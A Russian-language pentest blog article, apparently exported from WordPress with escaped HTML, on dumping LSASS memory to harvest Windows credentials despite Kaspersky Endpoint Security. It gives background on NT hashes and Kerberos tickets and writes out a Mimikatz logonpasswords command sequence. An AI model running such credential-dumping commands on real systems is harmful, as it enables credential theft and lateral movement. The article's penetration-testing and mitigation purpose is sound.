\u043f\u0435\u0440\u0435\u0434 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435\u043c \u0432 \u043f\u0440\u043e\u0434, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0430\u043a\u043a\u0443\u0440\u0430\u0442\u043d\u0435\u0435).<\/p>\n<\/li>\n<li>\n<p>\u0421\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u044c <a href=\"https:\/\/download.microsoft.com\/download\/7\/7\/A\/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9\/Mitigating-Pass-the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf\">\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f\u043c<\/a> \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f \u041e\u0421 \u0434\u043b\u044f \u0441\u043d\u0438\u0436\u0435\u043d\u0438\u044f \u0440\u0438\u0441\u043a\u0430 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a \u0442\u0438\u043f\u0430 Pass-the-Hash.<\/p>\n<\/li>\n<\/ul>\n<p>\u041d\u0443 \u0430 \u043f\u043e\u043a\u0430 \u0438\u0437\u0432\u0435\u0447\u043d\u0430\u044f \u0438\u0433\u0440\u0430 \u0432 \u043a\u043e\u0448\u043a\u0438-\u043c\u044b\u0448\u043a\u0438 \u043c\u0435\u0436\u0434\u0443 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440\u0430\u043c\u0438 \u0438 \u0432\u0435\u043d\u0434\u043e\u0440\u0430\u043c\u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f, Happy hacking!<\/p>\n<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"v-portal\" style=\"display:none;\"><\/div>\n<\/div>\n<p> <!----> <!----><br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/company\/angarasecurity\/blog\/661341\/\"> https:\/\/habr.com\/ru\/company\/angarasecurity\/blog\/661341\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435, \u0445\u0430\u0431\u0440\u043e\u043b\u044e\u0434\u0438!<\/p>\n<p>\u041c\u0435\u043d\u044f \u0437\u043e\u0432\u0443\u0442 <a class=\"mention\" href=\"\/users\/snovvcrash\">@snovvcrash<\/a>, \u0438 \u044f \u0440\u0430\u0431\u043e\u0442\u0430\u044e \u0432 \u043e\u0442\u0434\u0435\u043b\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Angara Security. \u041e\u0442\u0432\u0435\u0447\u0430\u044e \u044f, \u0437\u043d\u0430\u0447\u0438\u0442\u0441\u044f, \u0437\u0430 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043d\u044b\u0439 \u043f\u0435\u043d\u0442\u0435\u0441\u0442, \u0438 \u0432 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u044f \u0445\u043e\u0442\u0435\u043b \u0431\u044b \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e\u0431 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0434\u043e\u0431\u044b\u0447\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u00ab\u0432\u043d\u0443\u0442\u0440\u044f\u043a\u0435\u00bb \u2014 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0438 \u0441\u0435\u043a\u0440\u0435\u0442\u043e\u0432 \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe (MITRE ATT&amp;CK <a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/001\/\">T1003.001<\/a>) \u2014 \u0438, \u0432 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u043e\u0431 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u0445 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u043c\u0435\u0442\u043e\u0434\u0430 \u0432 \u0440\u0443-\u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0435 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435.<\/p>\n<p>\u0417\u0430 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430 \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440\u043e\u043c \u043c\u043e\u0438 \u043d\u0435\u0440\u0432\u044b \u0431\u044b\u043b\u0438 \u0438\u0437\u0440\u044f\u0434\u043d\u043e \u043f\u043e\u0442\u0440\u0435\u043f\u0430\u043d\u044b \u043d\u0430\u0448\u0438\u043c \u043b\u044e\u0431\u0438\u043c\u044b\u043c \u043e\u0442\u0435\u0447\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c Kaspersky Endpoint Security (\u0434\u0430\u043b\u0435\u0435 \u2014 KES), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u0443 \u043a\u0430\u0436\u0434\u043e\u0433\u043e <s>\u043f\u0435\u0440\u0432\u043e\u0433\u043e<\/s> \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430\u0448\u0435\u0433\u043e \u043a\u043b\u0438\u0435\u043d\u0442\u0430, \u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b, \u043d\u0430\u0433\u043b\u0443\u0445\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a lsass.exe (\u043d\u0435 \u0440\u0435\u043a\u043b\u0430\u043c\u0430!).<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u0441\u0432\u043e\u0439 \u043e\u043f\u044b\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u043a\u0430\u0441\u0442\u043e\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u0440\u0430\u0437\u043d\u044b\u0435 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043a\u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0438 \u043c\u043d\u0435 \u0441\u0434\u0430\u043c\u043f\u0438\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u044c LSASS \u043f\u0440\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u043c \u00ab\u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u043c\u00bb. \u041f\u043e\u0433\u043d\u0430\u043b\u0438!<\/p>\n<p><a class=\"anchor\"><\/a><\/p>\n<h2>\u041a\u0440\u0430\u0442\u043a\u0438\u0439 \u043b\u0438\u043a\u0431\u0435\u0437<\/h2>\n<p>\u0415\u0441\u043b\u0438 \u043d\u0435 \u0441\u0438\u043b\u044c\u043d\u043e \u0443\u0433\u043b\u0443\u0431\u043b\u044f\u0442\u044c\u0441\u044f \u0432 \u0442\u0435\u043e\u0440\u0438\u044e, \u0442\u043e Local Security Authority Subsystem Service (\u043e\u043d \u0436\u0435 LSASS) \u2014 \u044d\u0442\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441 (\u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b <code>C:\\Windows\\System32\\lsass.exe<\/code>), \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u0437\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u041e\u0421 Windows. \u0421\u0440\u0435\u0434\u0438 \u0435\u0433\u043e \u0437\u0430\u0434\u0430\u0447: \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u00ab\u043a\u0440\u0435\u0434\u00bb \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0438 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432 \u0432 \u0445\u043e\u0434\u0435 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f \u0442\u043e\u043a\u0435\u043d\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0441\u0441\u0438\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0440\u0430\u0431\u043e\u0442\u0430 \u0441 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430\u043c\u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (Security Support Provider, SSP) \u0438 \u0434\u0440.<\/p>\n<p>\u0414\u043b\u044f \u043d\u0430\u0441, \u043a\u0430\u043a \u0434\u043b\u044f \u044d\u0442\u0438\u0447\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432, \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435\u043c \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u0442 \u0442\u043e\u0442 \u0444\u0430\u043a\u0442, \u0447\u0442\u043e \u0432 \u0434\u043e\u043c\u0435\u043d\u0435 Active Directory \u043f\u0440\u0430\u0432\u0438\u0442 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u044f \u0435\u0434\u0438\u043d\u043e\u0433\u043e \u0432\u0445\u043e\u0434\u0430 Single Sign-On (SSO), \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 lsass.exe \u0445\u0440\u0430\u043d\u0438\u0442 \u0432 \u0441\u0435\u0431\u0435 \u0440\u0430\u0437\u043d\u044b\u0435 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, NT-\u0445\u0435\u0448\u0438 \u0438 \u0431\u0438\u043b\u0435\u0442\u044b Kerberos, \u0447\u0442\u043e\u0431\u044b \u00ab\u043f\u043e\u043b\u044c\u0437\u0430\u043a\u0443\u00bb \u043d\u0435 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u043f\u0435\u0447\u0430\u0442\u0430\u0442\u044c \u0441\u0432\u043e\u0439 \u043f\u0430\u0440\u043e\u043b\u042a \u0432 \u0432\u044b\u043b\u0435\u0437\u0430\u044e\u0449\u0435\u043c \u043d\u0430 \u044d\u043a\u0440\u0430\u043d\u0435 \u043e\u043a\u043e\u0448\u043a\u0435 \u043a\u0430\u0436\u0434\u044b\u0435 5 \u043c\u0438\u043d\u0443\u0442. \u0412 \u00ab\u043b\u0443\u0447\u0448\u0438\u0435\u00bb \u0432\u0440\u0435\u043c\u0435\u043d\u0430 \u0438\u0437 LSASS \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043f\u043e\u0442\u0430\u0449\u0438\u0442\u044c <strong>\u043f\u0430\u0440\u043e\u043b\u0438 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435<\/strong> \u0432 \u0441\u0438\u043b\u0443 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 WDigest (HTTP \u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442-\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f), \u043d\u043e \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 \u041e\u0421 Windows Server 2008 R2 \u0432\u0435\u043d\u0434\u043e\u0440 \u0440\u0435\u0448\u0438\u043b \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u0442\u044c \u044d\u0442\u043e\u0442 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.<\/p>\n<p>\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u0432 2\u043a22 \u043f\u0440\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u043c \u0434\u0430\u043c\u043f\u0435 LSASS \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0434\u043e\u0432\u043e\u043b\u044c\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c\u0441\u044f NT-\u0445\u0435\u0448\u0430\u043c\u0438 \u0438 \u0431\u0438\u043b\u0435\u0442\u0430\u043c\u0438 Kerberos, \u044d\u0442\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u0441 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0435\u043c\u0443 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u0435 AD \u0437\u0430 \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0439 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u043a \u0432\u0440\u0435\u043c\u0435\u043d\u0438. \u0420\u0435\u0430\u043b\u0438\u0437\u0443\u044f \u0441\u0445\u0435\u043c\u044b <a href=\"https:\/\/attack.mitre.org\/techniques\/T1550\/002\/\">Pass-the-Hash<\/a>, <a href=\"https:\/\/stealthbits.com\/blog\/how-to-detect-overpass-the-hash-attacks\/\">Overpass-the-Hash<\/a> \u0438 <a href=\"https:\/\/attack.mitre.org\/techniques\/T1550\/003\/\">Pass-the-Ticket<\/a>, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0441\u0442\u0440\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c\u0441\u044f \u043f\u043e \u0441\u0435\u0442\u0438 \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e, \u0441\u043e\u0431\u0438\u0440\u0430\u044f \u043f\u043e \u043f\u0443\u0442\u0438 \u0432\u0441\u0435 \u0431\u043e\u043b\u044c\u0448\u0435 \u0445\u0435\u0448\u0435\u0439 \u0438 \u00ab\u0442\u0438\u043a\u0435\u0442\u043e\u0432\u00bb, \u0447\u0442\u043e \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u0434\u0430\u0440\u0443\u0435\u0442 \u0435\u043c\u0443 \u00ab\u043a\u043b\u044e\u0447\u0438 \u043e\u0442 \u041a\u043e\u0440\u043e\u043b\u0435\u0432\u0441\u0442\u0432\u0430\u00bb \u0432 \u0432\u0438\u0434\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430.<\/p>\n<h2>\u042d\u043a\u0441\u043a\u0443\u0440\u0441 \u0432 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0434\u0430\u043c\u043f\u043e\u0432 LSASS<\/h2>\n<p>\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043f\u0435\u0440\u0432\u043e\u043f\u0440\u043e\u0445\u043e\u0434\u0446\u0435\u0432 \u0432 \u0440\u0435\u043c\u0435\u0441\u043b\u0435 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 LSASS.<\/p>\n<h3>Mimikatz<\/h3>\n<p>\u0411\u044b\u043b\u043e \u0431\u044b \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435\u043c \u043d\u0435 \u043d\u0430\u0447\u0430\u0442\u044c \u043f\u043e\u0432\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0435 \u0441 \u0442\u0430\u043a\u043e\u0433\u043e \u043c\u0430\u0441\u0442\u043e\u0434\u043e\u043d\u0442\u0430 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043f\u043e\u0442\u0440\u043e\u0448\u0435\u043d\u0438\u044f \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Windows \u043a\u0430\u043a <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\">Mimikatz<\/a>, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0445\u043e\u0442\u044c \u0440\u0430\u0437 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u043b\u044e\u0431\u043e\u0439 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440.<\/p>\n<p>\u041c\u043e\u0434\u0443\u043b\u044c <code>sekurlsa::logonpasswords<\/code> \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u00ab\u043d\u0430\u043b\u0435\u0442\u0443\u00bb \u043f\u0430\u0440\u0441\u0438\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u044c lsass.exe \u0441 \u0446\u0435\u043b\u044c\u044e \u043f\u043e\u0438\u0441\u043a\u0430 \u0441\u0435\u043a\u0440\u0435\u0442\u0438\u043a\u043e\u0432 \u0431\u0435\u0437 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u0434\u0430\u043c\u043f\u0430 \u043d\u0430 \u0434\u0438\u0441\u043a. \u042d\u0442\u043e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u043e\u0438\u0441\u0442\u0438\u043d\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u043b \u0440\u0435\u0432\u043e\u043b\u044e\u0446\u0438\u044e \u0432 \u043d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u0445 \u0438 \u043f\u043e\u043b\u043e\u0436\u0438\u043b \u043d\u0430\u0447\u0430\u043b\u043e \u043c\u043d\u043e\u0433\u0438\u043c \u0434\u0440\u0443\u0433\u0438\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0441 \u0445\u043e\u0441\u0442\u043e\u0432 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows.<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>C:\\>mimikatz.exe mimikatz # privilege::debug mimikatz # token::elevate mimikatz # log out.txt mimikatz # sekurlsa::logonpasswords full mimikatz # exit  C:\\>mimikatz.exe \"privilege::debug\" \"token::elevate\" \"log out.txt\" \"sekurlsa::logonpasswords full\" \"exit\"<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><figcaption>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Mimikatz (logonpasswords)<\/figcaption><\/figure>\n<p>\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e \u0434\u043b\u044f \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440\u043e\u0432, \u0432\u0435\u043d\u0434\u043e\u0440\u044b <abbr title=\"Antivirus\" type=\"abbr\">AV<\/abbr> \/ <abbr title=\"Endpoint Detection &amp; Response\" type=\"abbr\">EDR <\/abbr>\u0431\u044b\u0441\u0442\u0440\u043e \u00ab\u043f\u0440\u043e\u0441\u0435\u043a\u043b\u0438 \u0444\u0438\u0448\u043a\u0443\u00bb \u0438 \u0441\u0442\u0430\u043b\u0438 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u043a \u00ab\u041c\u0438\u043c\u0438\u043a\u0443\u00bb <strong>&lt;sarkazm><\/strong>\u043a\u0430\u043a \u043a \u0441\u0430\u043c\u043e\u043c\u0443 \u043e\u043f\u0430\u0441\u043d\u043e\u043c\u0443 \u041f\u041e, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u0430 \u0432\u0441\u044e \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u0442\u0432\u0430<strong>&lt;\/sarkazm><\/strong>, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0430 \u0441\u0435\u0433\u043e\u0434\u043d\u044f\u0448\u043d\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043e\u043d \u043f\u0440\u0438\u0433\u043e\u0434\u0435\u043d \u043b\u0438\u0448\u044c \u043a\u0430\u043a \u043f\u043e\u0441\u043e\u0431\u0438\u0435 \u0434\u043b\u044f \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432 \u043d\u0435\u043c \u0442\u0435\u0445\u043d\u0438\u043a \u2014 \u0434\u043b\u044f \u0438\u0445 \u043f\u0435\u0440\u0435\u043e\u0441\u043c\u044b\u0441\u043b\u0435\u043d\u0438\u044f \u0438 \u043f\u0435\u0440\u0435\u0438\u0437\u043e\u0431\u0440\u0435\u0442\u0435\u043d\u0438\u044f \u0432 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0445.<\/p>\n<blockquote>\n<p>\u041d\u0430 \u0437\u0430\u043c\u0435\u0442\u043a\u0443: \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\/wiki\">\u0432\u0438\u043a\u0438<\/a> Mimikatz \u043f\u043e\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0432\u0441\u0435 \u0435\u0433\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044d\u043d\u0442\u0443\u0437\u0438\u0430\u0441\u0442\u044b InfoSec-\u043a\u043e\u043c\u044c\u044e\u043d\u0438\u0442\u0438 \u0441\u043e\u0437\u0434\u0430\u043b\u0438 \u0432\u043e\u0442 <a href=\"https:\/\/tools.thehacker.recipes\/mimikatz\">\u0442\u0430\u043a\u043e\u0439<\/a> \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0440\u0435\u0441\u0443\u0440\u0441, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0432\u043e\u043f\u0440\u043e\u0441\u043e\u0432, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0442\u0430 \u0438\u043b\u0438 \u0438\u043d\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u044d\u0442\u043e\u0433\u043e \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430.<\/p>\n<\/blockquote>\n<h3>ProcDump<\/h3>\n<p>\u0414\u0440\u0443\u0433\u0438\u043c \u0444\u0430\u0432\u043e\u0440\u0438\u0442\u043e\u043c \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u043e\u0432 